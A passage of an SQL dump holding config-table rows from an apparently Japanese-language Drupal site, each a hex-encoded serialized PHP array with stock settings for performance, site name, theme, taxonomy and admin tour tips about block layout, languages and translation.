('', 'system.menu.tools', 0x613a393a7b733a343a2275756964223b733a33363a2262373735663138652d653135632d343565652d616537362d376662633532613537363636223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2242434d2d7656317a7a52614c484e3138647141525f4375474f6a3841464a76547837424b6c5f3847637863223b7d733a323a226964223b733a353a22746f6f6c73223b733a353a226c6162656c223b733a353a22546f6f6c73223b733a31313a226465736372697074696f6e223b733a33393a225573657220746f6f6c206c696e6b732c206f6674656e206164646564206279206d6f64756c6573223b733a363a226c6f636b6564223b623a313b7d),
('', 'system.performance', 0x613a353a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226232637373726a2d6c4f6d415449626465686643716643466756523071436478785768777161324b425651223b7d733a353a226361636865223b613a313a7b733a343a2270616765223b613a313a7b733a373a226d61785f616765223b693a303b7d7d733a333a22637373223b613a323a7b733a31303a2270726570726f63657373223b623a303b733a343a22677a6970223b623a313b7d733a383a22666173745f343034223b613a343a7b733a373a22656e61626c6564223b623a313b733a353a227061746873223b733a36393a222f5c2e283f3a7478747c706e677c6769667c6a70653f677c6373737c6a737c69636f7c7377667c666c767c6367697c6261747c706c7c646c6c7c6578657c61737029242f69223b733a31333a226578636c7564655f7061746873223b733a32373a222f5c2f283f3a7374796c65737c696d6167656361636865295c2f2f223b733a343a2268746d6c223b733a3136323a223c21444f43545950452068746d6c3e3c68746d6c3e3c686561643e3c7469746c653e343034204e6f7420466f756e643c2f7469746c653e3c2f686561643e3c626f64793e3c68313e4e6f7420466f756e643c2f68313e3c703e546865207265717565737465642055524c202240706174682220776173206e6f7420666f756e64206f6e2074686973207365727665722e3c2f703e3c2f626f64793e3c2f68746d6c3e223b7d733a323a226a73223b613a323a7b733a31303a2270726570726f63657373223b623a303b733a343a22677a6970223b623a313b7d7d),
('', 'system.rss', 0x613a323a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224d49704e7a6c47346750756e665337765443775550756d3651483347557345424d6a2d71533633314a7730223b7d733a353a226974656d73223b613a313a7b733a393a22766965775f6d6f6465223b733a333a22727373223b7d7d),
('', 'system.site', 0x613a31313a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2256444a78545a74515232317142346c764f71387a737a4a5a4c764c4b7253505170646e3245335437315777223b7d733a383a226c616e67636f6465223b733a323a226a61223b733a343a2275756964223b733a33363a2230343562383733622d616433392d346632302d623833332d623138656464653334376366223b733a343a226e616d65223b733a34353a2257656c636f6d6520746f204e657720436f6d65742054726164696e67204167656e637920436f2e2c204c74642e223b733a343a226d61696c223b733a32323a2263686177636861772e6b637440676d61696c2e636f6d223b733a363a22736c6f67616e223b733a303a22223b733a343a2270616765223b613a333a7b693a3430333b733a303a22223b693a3430343b733a303a22223b733a353a2266726f6e74223b733a353a222f6e6f6465223b7d733a31383a2261646d696e5f636f6d706163745f6d6f6465223b623a303b733a31373a227765696768745f73656c6563745f6d6178223b693a3130303b733a31363a2264656661756c745f6c616e67636f6465223b733a323a226a61223b733a31373a226d61696c5f6e6f74696669636174696f6e223b733a303a22223b7d),
('', 'system.theme', 0x613a333a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22654a353239564d31675349415f766754793250646944764a7547307868537866516a43796c35574b6c7634223b7d733a353a2261646d696e223b733a353a22636c61726f223b733a373a2264656661756c74223b733a393a226e65775f636f6d6574223b7d),
('', 'system.theme.global', 0x613a343a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a223972415534506b7537654d4251786175517141676a7a6c636963465a324173367a4561367a76546c434238223b7d733a373a2266617669636f6e223b613a343a7b733a383a226d696d6574797065223b733a32343a22696d6167652f766e642e6d6963726f736f66742e69636f6e223b733a343a2270617468223b733a303a22223b733a333a2275726c223b733a303a22223b733a31313a227573655f64656661756c74223b623a313b7d733a383a226665617475726573223b613a343a7b733a32303a22636f6d6d656e745f757365725f70696374757265223b623a313b733a32353a22636f6d6d656e745f757365725f766572696669636174696f6e223b623a313b733a373a2266617669636f6e223b623a313b733a31373a226e6f64655f757365725f70696374757265223b623a313b7d733a343a226c6f676f223b613a333a7b733a343a2270617468223b733a303a22223b733a333a2275726c223b4e3b733a31313a227573655f64656661756c74223b623a313b7d7d),
('', 'taxonomy.settings', 0x613a343a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a227a4b7061575436634a633174565151615471617447454c614371555f6f7952796d367a546c323759696173223b7d733a32303a226d61696e7461696e5f696e6465785f7461626c65223b623a313b733a31373a226f766572726964655f73656c6563746f72223b623a303b733a32303a227465726d735f7065725f706167655f61646d696e223b693a3130303b7d),
('', 'taxonomy.vocabulary.tags', 0x613a31303a7b733a343a2275756964223b733a33363a2235623336313632352d363366622d346433392d396531392d323863643836386335623434223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22796f4e5672656f5464545a545937477545386649394a6d7871647a38766c6f345a4a4b69784d4e536f7377223b7d733a343a226e616d65223b733a343a2254616773223b733a333a22766964223b733a343a2274616773223b733a31313a226465736372697074696f6e223b733a36313a22557365207461677320746f2067726f75702061727469636c6573206f6e2073696d696c617220746f7069637320696e746f2063617465676f726965732e223b733a363a22776569676874223b693a303b733a31323a226e65775f7265766973696f6e223b623a303b7d),
('', 'text.settings', 0x613a323a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22426b657762373752424f4b335f61584d5073703870383767626330334e766d433567424c7a506c37685641223b7d733a32323a2264656661756c745f73756d6d6172795f6c656e677468223b693a3630303b7d),
('', 'tour.tour.block-layout', 0x613a31303a7b733a343a2275756964223b733a33363a2265323163346564392d383337632d343761302d613631632d643338333434666333356131223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a353a22626c6f636b223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22727563744f30494f73676852334349624e642d3051664c544469556f3867494a376d425f6e7853696c346f223b7d733a323a226964223b733a31323a22626c6f636b2d6c61796f7574223b733a353a226c6162656c223b733a31373a22426c6f636b204c61796f75742050616765223b733a363a226d6f64756c65223b733a353a22626c6f636b223b733a363a22726f75746573223b613a313a7b693a303b613a313a7b733a31303a22726f7574655f6e616d65223b733a31393a22626c6f636b2e61646d696e5f646973706c6179223b7d7d733a343a2274697073223b613a353a7b733a31323a22626c6f636b2d6c61796f7574223b613a353a7b733a323a226964223b733a31323a22626c6f636b2d6c61796f7574223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31323a22426c6f636b204c61796f7574223b733a363a22776569676874223b693a313b733a343a22626f6479223b733a3135303a22426c6f636b732061726520626f786573206f6620636f6e74656e742072656e646572656420696e746f20616e20617265612c206f7220726567696f6e2c206f66206120776562207061676520746861742063616e20626520646973706c6179656420696e20726567696f6e7320287375636820617320666f6f746572206f72207369646562617229206f6e20796f757220706167652e223b7d733a31313a22706c6163652d626c6f636b223b613a363a7b733a323a226964223b733a31313a22706c6163652d626c6f636b223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31323a22506c61636520426c6f636b73223b733a363a22776569676874223b693a323b733a383a2273656c6563746f72223b733a31343a222e627574746f6e2d2d736d616c6c223b733a343a22626f6479223b733a3136333a22416e7920637573746f6d206f7220636f6e747269627574656420626c6f636b2063616e20626520616464656420746f206120706172746963756c617220726567696f6e20627920636c69636b696e67206f6e206120627574746f6e20506c61636520626c6f636b2e2041206e657720626c6f636b2063616e20616c736f206265206372656174656420627920636c69636b696e67206f6e20506c61636520426c6f636b223b7d733a31323a22626c6f636b2d726567696f6e223b613a363a7b733a323a226964223b733a31323a22626c6f636b2d726567696f6e223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31323a22426c6f636b20526567696f6e223b733a363a22776569676874223b693a333b733a383a2273656c6563746f72223b733a32303a222e626c6f636b2d726567696f6e2d73656c656374223b733a343a22626f6479223b733a3135313a2241737369676e206f72206368616e67652074686520726567696f6e206f66206120626c6f636b20627920636c69636b696e6720686572652e20412064726f70646f776e206c697374207769746820616c6c2074686520726567696f6e732077696c6c206170706561722e20596f752063616e20706c616365206f6e6520626c6f636b20696e206d756c7469706c6520726567696f6e732e223b7d733a31353a22636f6e6669677572652d626c6f636b223b613a363a7b733a323a226964223b733a31353a22636f6e6669677572652d626c6f636b223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31353a22436f6e66696775726520426c6f636b223b733a363a22776569676874223b693a343b733a383a2273656c6563746f72223b733a31383a222e64726f70627574746f6e2d776964676574223b733a343a22626f6479223b733a3137333a22427920436c69636b696e67206f6e2022436f6e6669677572652220796f752063616e20676f20616865616420616e6420656469742074686520636f6e74656e7473206f662074686520626c6f636b2c206465616c207769746820746865207669736962696c6974792073657474696e677320616e64206576656e206368616e67652074686520706c6163656d656e74206f66207768657265206974206973206f6e20796f7572207468656d652e223b7d733a32303a22637573746f6d2d626c6f636b2d6c696272617279223b613a353a7b733a323a226964223b733a32303a22637573746f6d2d626c6f636b2d6c696272617279223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a32303a22437573746f6d20426c6f636b204c696272617279223b733a363a22776569676874223b693a353b733a343a22626f6479223b733a3230333a2254686520626c6f636b206d616e6167656d656e742073637265656e20616c736f2068617320616e20616e6f7468657220746162206f6e2074686520746f70207768696368206973207573656420746f2061646420437573746f6d20626c6f636b732e20546865206e616d65206f6620746865207461622069732022437573746f6d20626c6f636b206c696272617279222e20546869732074616220756c74696d6174656c792070726f76696465732061206c696e6b20746f2061646420637573746f6d20626c6f636b732e223b7d7d7d),
('', 'tour.tour.language', 0x613a31303a7b733a343a2275756964223b733a33363a2263646339366633622d383166622d343838342d616132652d313661383535366635353930223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a383a226c616e6775616765223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224f6b7a38514d595247767139356e714c47596a7038674c69793933444b6f4d457a45565a5677456567344d223b7d733a323a226964223b733a383a226c616e6775616765223b733a353a226c6162656c223b733a383a224c616e6775616765223b733a363a226d6f64756c65223b733a383a226c616e6775616765223b733a363a22726f75746573223b613a313a7b693a303b613a313a7b733a31303a22726f7574655f6e616d65223b733a33393a22656e746974792e636f6e666967757261626c655f6c616e67756167652e636f6c6c656374696f6e223b7d7d733a343a2274697073223b613a363a7b733a31373a226c616e67756167652d6f76657276696577223b613a353a7b733a323a226964223b733a31373a226c616e67756167652d6f76657276696577223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a393a224c616e677561676573223b733a363a22776569676874223b693a313b733a343a22626f6479223b733a39363a223c703e54686520224c616e67756167657322207061676520616c6c6f777320796f7520746f206164642c20656469742c2064656c6574652c20616e642072656f72646572206c616e67756167657320666f722074686520736974652e3c2f703e223b7d733a31323a226c616e67756167652d616464223b613a363a7b733a323a226964223b733a31323a226c616e67756167652d616464223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31363a22416464696e67206c616e677561676573223b733a363a22776569676874223b693a323b733a383a2273656c6563746f72223b733a31343a222e627574746f6e2d616374696f6e223b733a343a22626f6479223b733a3137313a223c703e546f20616464206d6f7265206c616e67756167657320746f20796f757220736974652c20636c69636b207468652022416464206c616e67756167652220627574746f6e2e3c2f703e3c703e4164646564206c616e6775616765732077696c6c20626520646973706c6179656420696e20746865206c616e6775616765206c69737420616e642063616e207468656e20626520656469746564206f722064656c657465642e3c2f703e223b7d733a31363a226c616e67756167652d72656f72646572223b613a363a7b733a323a226964223b733a31363a226c616e67756167652d72656f72646572223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a32303a2252656f72646572696e67206c616e677561676573223b733a363a22776569676874223b693a333b733a383a2273656c6563746f72223b733a31303a222e647261676761626c65223b733a343a22626f6479223b733a3430323a223c703e546f2072656f7264657220746865206c616e677561676573206f6e20796f757220736974652c207573652074686520647261672069636f6e73206e65787420746f2065616368206c616e67756167652e3c2f703e3c703e546865206f726465722073686f776e20686572652069732074686520646973706c6179206f7264657220666f72206c616e6775616765206c69737473206f6e207468652073697465207375636820617320696e20746865206c616e677561676520737769746368657220626c6f636b732070726f76696465642062792074686520496e74657266616365205472616e736c6174696f6e20616e6420436f6e74656e74205472616e736c6174696f6e206d6f64756c65732e3c2f703e3c703e5768656e20796f752061726520646f6e6520776974682072656f72646572696e6720746865206c616e6775616765732c20636c69636b2074686520225361766520636f6e66696775726174696f6e2220627574746f6e20666f7220746865206368616e67657320746f2074616b65206566666563742e3c2f703e223b7d733a31363a226c616e67756167652d64656661756c74223b613a363a7b733a323a226964223b733a31363a226c616e67756167652d64656661756c74223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a32353a225365742061206c616e67756167652061732064656661756c74223b733a363a22776569676874223b693a343b733a383a2273656c6563746f72223b733a33353a222e6a732d666f726d2d6974656d2d736974652d64656661756c742d6c616e6775616765223b733a343a22626f6479223b733a3237343a223c703e596f752063616e206368616e6765207468652064656661756c74206c616e6775616765206f662074686520736974652062792063686f6f73696e67206f6e65206f6620796f757220636f6e66696775726564206c616e6775616765732061732064656661756c742e2054686520736974652077696c6c20757365207468652064656661756c74206c616e677561676520696e20736974756174696f6e73207768657265206e6f2063686f696365206973206d616465206275742061206c616e67756167652073686f756c64206265207365742c20666f72206578616d706c6520617320746865206c616e6775616765206f662074686520646973706c6179656420696e746572666163652e3c2f703e223b7d733a31393a226c616e67756167652d6f7065726174696f6e73223b613a363a7b733a323a226964223b733a31393a226c616e67756167652d6f7065726174696f6e73223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31393a224d6f64696679696e67206c616e677561676573223b733a363a22776569676874223b693a353b733a383a2273656c6563746f72223b733a31393a222e64726f70627574746f6e2d77726170706572223b733a343a22626f6479223b733a3339393a223c703e4f7065726174696f6e73206172652070726f766964656420666f722065646974696e6720616e642064656c6574696e6720796f7572206c616e6775616765732e3c2f703e3c703e596f752063616e206564697420746865206e616d6520616e642074686520646972656374696f6e206f6620746865206c616e67756167652e3c2f703e3c703e44656c65746564206c616e6775616765732063616e206265206164646564206261636b2061742061206c617465722074696d652e2044656c6574696e672061206c616e67756167652077696c6c2072656d6f766520616c6c20696e74657266616365207472616e736c6174696f6e73206173736f63696174656420776974682069742c20616e6420636f6e74656e7420696e2074686973206c616e67756167652077696c6c2062652073657420746f206265206c616e6775616765206e65757472616c2e204e6f7465207468617420796f752063616e6e6f742064656c657465207468652064656661756c74206c616e6775616765206f662074686520736974652e3c2f703e223b7d733a31373a226c616e67756167652d636f6e74696e7565223b613a353a7b733a323a226964223b733a31373a226c616e67756167652d636f6e74696e7565223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31333a22436f6e74696e75696e67206f6e223b733a363a22776569676874223b693a363b733a343a22626f6479223b733a3236303a223c703e4e6f77207468617420796f75206861766520616e206f76657276696577206f662074686520224c616e6775616765732220706167652c20796f752063616e20636f6e74696e75652062793a3c756c3e3c6c693e3c6120687265663d225b736974653a75726c5d61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f616464223e416464696e672061206c616e67756167653c2f613e3c2f6c693e3c6c693e52656f72646572696e67206c616e6775616765733c2f6c693e3c6c693e45646974696e672061206c616e67756167653c2f6c693e3c6c693e44656c6574696e672061206c616e67756167653c2f6c693e3c2f756c3e3c2f703e223b7d7d7d),
('', 'tour.tour.language-add', 0x613a31303a7b733a343a2275756964223b733a33363a2266646238346532352d386137382d343665382d386464312d663538393764326161633666223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a383a226c616e6775616765223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a227663446439483075496c794f51476f56414a75443341444d6e516552525f5833422d6f6a79623843626e63223b7d733a323a226964223b733a31323a226c616e67756167652d616464223b733a353a226c6162656c223b733a31363a22416464696e67206c616e677561676573223b733a363a226d6f64756c65223b733a383a226c616e6775616765223b733a363a22726f75746573223b613a313a7b693a303b613a313a7b733a31303a22726f7574655f6e616d65223b733a31323a226c616e67756167652e616464223b7d7d733a343a2274697073223b613a333a7b733a32313a226c616e67756167652d6164642d6f76657276696577223b613a353a7b733a323a226964223b733a32313a226c616e67756167652d6164642d6f76657276696577223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31363a22416464696e67206c616e677561676573223b733a363a22776569676874223b693a313b733a343a22626f6479223b733a3135343a223c703e5468697320706167652070726f766964657320746865206162696c69747920746f2061646420636f6d6d6f6e206c616e67756167657320746f20796f757220736974652e3c2f703e3c703e4966207468652064657369726564206c616e6775616765206973206e6f7420617661696c61626c652c20796f752063616e20616464206120637573746f6d206c616e67756167652e3c2f703e223b7d733a31393a226c616e67756167652d6164642d63686f6f7365223b613a363a7b733a323a226964223b733a31393a226c616e67756167652d6164642d63686f6f7365223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31353a2253656c656374206c616e6775616765223b733a363a22776569676874223b693a323b733a383a2273656c6563746f72223b733a32353a2223656469742d707265646566696e65642d6c616e67636f6465223b733a343a22626f6479223b733a3331323a223c703e43686f6f73652061206c616e67756167652066726f6d20746865206c6973742c206f722063686f6f73652022437573746f6d206c616e67756167652e2e2e222061742074686520656e64206f6620746865206c6973742e3c2f703e3c703e436c69636b207468652022416464206c616e67756167652220627574746f6e207768656e20796f752061726520646f6e652063686f6f73696e6720796f7572206c616e67756167652e3c2f703e3c703e5768656e20616464696e67206120637573746f6d206c616e67756167652c20796f752077696c6c2067657420616e206164646974696f6e616c20666f726d20776865726520796f752063616e2070726f7669646520746865206e616d652c20636f64652c20616e6420646972656374696f6e206f6620746865206c616e67756167652e3c2f703e223b7d733a32313a226c616e67756167652d6164642d636f6e74696e7565223b613a353a7b733a323a226964223b733a32313a226c616e67756167652d6164642d636f6e74696e7565223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31333a22436f6e74696e75696e67206f6e223b733a363a22776569676874223b693a333b733a343a22626f6479223b733a3234393a223c703e4e6f77207468617420796f75206861766520616e206f76657276696577206f66207468652022416464206c616e6775616765732220666561747572652c20796f752063616e20636f6e74696e75652062793a3c756c3e3c6c693e416464696e672061206c616e67756167653c2f6c693e3c6c693e416464696e67206120637573746f6d206c616e67756167653c2f6c693e3c6c693e3c6120687265663d225b736974653a75726c5d61646d696e2f636f6e6669672f726567696f6e616c2f6c616e6775616765223e56696577696e6720636f6e66696775726564206c616e6775616765733c2f613e3c2f6c693e3c2f756c3e3c2f703e223b7d7d7d),
('', 'tour.tour.language-edit', 0x613a31303a7b733a343a2275756964223b733a33363a2261373438663739372d643433332d343431662d386161612d363037383531316665373034223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a383a226c616e6775616765223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22676a597659774d71756c4e737137566d5363574b4f71455578617239415830547647387666434367755551223b7d733a323a226964223b733a31333a226c616e67756167652d65646974223b733a353a226c6162656c223b733a31373a2245646974696e67206c616e677561676573223b733a363a226d6f64756c65223b733a383a226c616e6775616765223b733a363a22726f75746573223b613a313a7b693a303b613a313a7b733a31303a22726f7574655f6e616d65223b733a33383a22656e746974792e636f6e666967757261626c655f6c616e67756167652e656469745f666f726d223b7d7d733a343a2274697073223b613a353a7b733a32323a226c616e67756167652d656469742d6f76657276696577223b613a353a7b733a323a226964223b733a32323a226c616e67756167652d656469742d6f76657276696577223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31373a2245646974696e67206c616e677561676573223b733a363a22776569676874223b693a313b733a343a22626f6479223b733a39383a223c703e5468697320706167652070726f766964657320746865206162696c69747920746f20656469742061206c616e6775616765206f6e20796f757220736974652c20696e636c7564696e6720637573746f6d206c616e6775616765732e3c2f703e223b7d733a32323a226c616e67756167652d656469742d6c616e67636f6465223b613a363a7b733a323a226964223b733a32323a226c616e67756167652d656469742d6c616e67636f6465223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31333a224c616e677561676520636f6465223b733a363a22776569676874223b693a323b733a383a2273656c6563746f72223b733a31393a2223656469742d6c616e67636f64652d76696577223b733a343a22626f6479223b733a3132323a223c703e596f752063616e6e6f74206368616e67652074686520636f6465206f662061206c616e6775616765206f6e2074686520736974652c2073696e63652069742069732075736564206279207468652073797374656d20746f206b65657020747261636b206f6620746865206c616e67756167652e3c2f703e223b7d733a31393a226c616e67756167652d656469742d6c6162656c223b613a363a7b733a323a226964223b733a31393a226c616e67756167652d656469742d6c6162656c223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31333a224c616e6775616765206e616d65223b733a363a22776569676874223b693a333b733a383a2273656c6563746f72223b733a31313a2223656469742d6c6162656c223b733a343a22626f6479223b733a3238393a223c703e546865206c616e6775616765206e616d652069732075736564207468726f7567686f757420746865207369746520666f7220616c6c20757365727320616e64206973207772697474656e20696e20456e676c6973682e204e616d6573206f66206275696c742d696e206c616e6775616765732063616e206265207472616e736c61746564207573696e672074686520496e74657266616365205472616e736c6174696f6e206d6f64756c652c20616e64206e616d6573206f6620626f7468206275696c742d696e20616e6420637573746f6d206c616e6775616765732063616e206265207472616e736c61746564207573696e672074686520436f6e66696775726174696f6e205472616e736c6174696f6e206d6f64756c652e3c2f703e223b7d733a32333a226c616e67756167652d656469742d646972656374696f6e223b613a363a7b733a323a226964223b733a32333a226c616e67756167652d656469742d646972656374696f6e223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31383a224c616e677561676520646972656374696f6e223b733a363a22776569676874223b693a343b733a383a2273656c6563746f72223b733a33373a2223656469742d646972656374696f6e2d2d777261707065722d2d6465736372697074696f6e223b733a343a22626f6479223b733a3139363a223c703e43686f6f736520696620746865206c616e6775616765206973206120224c65667420746f20726967687422206f722022526967687420746f206c65667422206c616e67756167652e3c2f703e3c703e4e6f74652074686174206e6f7420616c6c207468656d657320737570706f72742022526967687420746f206c65667422206c61796f7574732c20736f207465737420796f7572207468656d6520696620796f7520617265207573696e672022526967687420746f206c656674222e3c2f703e223b7d733a32323a226c616e67756167652d656469742d636f6e74696e7565223b613a353a7b733a323a226964223b733a32323a226c616e67756167652d656469742d636f6e74696e7565223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31333a22436f6e74696e75696e67206f6e223b733a363a22776569676874223b693a353b733a343a22626f6479223b733a3231373a223c703e4e6f77207468617420796f75206861766520616e206f76657276696577206f6620746865202245646974206c616e67756167652220666561747572652c20796f752063616e20636f6e74696e75652062793a3c756c3e3c6c693e45646974696e672061206c616e67756167653c2f6c693e3c6c693e3c6120687265663d225b736974653a75726c5d61646d696e2f636f6e6669672f726567696f6e616c2f6c616e6775616765223e56696577696e6720636f6e66696775726564206c616e6775616765733c2f613e3c2f6c693e3c2f756c3e3c2f703e223b7d7d7d),
('', 'tour.tour.locale', 0x613a31303a7b733a343a2275756964223b733a33363a2262306639643439642d633766372d343737372d616237392d323731623031663261376137223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a226c6f63616c65223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224b6378315049772d4b674762546f355f744f6b62493654574a69505f305372377435543953754d56326841223b7d733a323a226964223b733a363a226c6f63616c65223b733a353a226c6162656c223b733a31313a225472616e736c6174696f6e223b733a363a226d6f64756c65223b733a363a226c6f63616c65223b733a363a22726f75746573223b613a313a7b693a303b613a313a7b733a31303a22726f7574655f6e616d65223b733a32313a226c6f63616c652e7472616e736c6174655f70616765223b7d7d733a343a2274697073223b613a383a7b733a31353a226c6f63616c652d6f76657276696577223b613a353a7b733a323a226964223b733a31353a226c6f63616c652d6f76657276696577223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a32363a225573657220696e74657266616365207472616e736c6174696f6e223b733a363a22776569676874223b693a313b733a343a22626f6479223b733a3238303a2254686973207061676520616c6c6f777320796f7520746f207472616e736c61746520746865207573657220696e74657266616365206f72206d6f64696679206578697374696e67207472616e736c6174696f6e732e20496620796f75206861766520696e7374616c6c656420796f7572207369746520696e697469616c6c7920696e20456e676c6973682c20796f75206d7573742066697273742061646420616e6f74686572206c616e6775616765206f6e20746865203c6120687265663d225b736974653a75726c5d61646d696e2f636f6e6669672f726567696f6e616c2f6c616e6775616765223e4c616e67756167657320706167653c2f613e2c20696e206f7264657220746f20757365207468697320706167652e223b7d733a31353a226c6f63616c652d6c616e6775616765223b613a363a7b733a323a226964223b733a31353a226c6f63616c652d6c616e6775616765223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a32303a225472616e736c6174696f6e206c616e6775616765223b733a363a22776569676874223b693a323b733a383a2273656c6563746f72223b733a31343a2223656469742d6c616e67636f6465223b733a343a22626f6479223b733a34323a2243686f6f736520746865206c616e677561676520796f752077616e7420746f207472616e736c6174652e223b7d733a31333a226c6f63616c652d736561726368223b613a363a7b733a323a226964223b733a31333a226c6f63616c652d736561726368223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a363a22536561726368223b733a363a22776569676874223b693a333b733a383a2273656c6563746f72223b733a31323a2223656469742d737472696e67223b733a343a22626f6479223b733a3130303a22456e7465722074686520737065636966696320776f7264206f722073656e74656e636520796f752077616e7420746f207472616e736c6174652c20796f752063616e20616c736f207772697465206a75737420612070617274206f66206120776f72642e223b7d733a31333a226c6f63616c652d66696c746572223b613a363a7b733a323a226964223b733a31333a226c6f63616c652d66696c746572223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31373a2246696c7465722074686520736561726368223b733a363a22776569676874223b693a343b733a383a2273656c6563746f72223b733a31373a2223656469742d7472616e736c6174696f6e223b733a343a22626f6479223b733a3230323a22596f752063616e2073656172636820666f7220756e7472616e736c6174656420737472696e677320696620796f752077616e7420746f207472616e736c61746520736f6d657468696e6720746861742069736e2774207472616e736c61746564207965742e20496620796f752077616e7420746f206d6f6469667920616e206578697374696e67207472616e736c6174696f6e2c20796f75206d696768742077616e7420746f20736561726368206f6e6c7920666f72207472616e736c6174656420737472696e67732e223b7d733a31333a226c6f63616c652d7375626d6974223b613a363a7b733a323a226964223b733a31333a226c6f63616c652d7375626d6974223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a32363a224170706c7920796f757220736561726368206372697465726961223b733a363a22776569676874223b693a353b733a383a2273656c6563746f72223b733a31323a2223656469742d7375626d6974223b733a343a22626f6479223b733a36373a22546f206170706c7920796f7572207365617263682063726974657269612c20636c69636b206f6e20746865203c656d3e46696c7465723c2f656d3e20627574746f6e2e223b7d733a31363a226c6f63616c652d7472616e736c617465223b613a363a7b733a323a226964223b733a31363a226c6f63616c652d7472616e736c617465223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a393a225472616e736c617465223b733a363a22776569676874223b693a363b733a383a2273656c6563746f72223b733a32323a222e6a732d666f726d2d747970652d7465787461726561223b733a343a22626f6479223b733a3138303a22596f752063616e20777269746520796f7572206f776e207472616e736c6174696f6e20696e207468652074657874206669656c6473206f662074686520726967687420636f6c756d6e2e2054727920746f20666967757265206f757420696e20776869636820636f6e746578742074686520746578742077696c6c206265207573656420696e206f7264657220746f207472616e736c61746520697420696e2074686520617070726f707269617465207761792e223b7d733a31353a226c6f63616c652d76616c6964617465223b613a363a7b733a323a226964223b733a31353a226c6f63616c652d76616c6964617465223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a32343a2256616c696461746520746865207472616e736c6174696f6e223b733a363a22776569676874223b693a373b733a383a2273656c6563746f72223b733a31353a2223656469742d7375626d69742d2d32223b733a343a22626f6479223b733a3138313a225768656e20796f7520686176652066696e697368656420796f7572207472616e736c6174696f6e732c20636c69636b206f6e20746865203c656d3e53617665207472616e736c6174696f6e733c2f656d3e20627574746f6e2e20596f75206d757374207361766520796f7572207472616e736c6174696f6e732c20656163682074696d65206265666f7265206368616e67696e67207468652070616765206f72206d616b696e672061206e6577207365617263682e223b7d733a31353a226c6f63616c652d636f6e74696e7565223b613a353a7b733a323a226964223b733a31353a226c6f63616c652d636f6e74696e7565223b733a363a22706c7567696e223b733a343a2274657874223b733a353a226c6162656c223b733a31333a22436f6e74696e75696e67206f6e223b733a363a22776569676874223b693a383b733a343a22626f6479223b733a3335323a22546865207472616e736c6174696f6e7320796f752068617665206d61646520686572652077696c6c2062652075736564206f6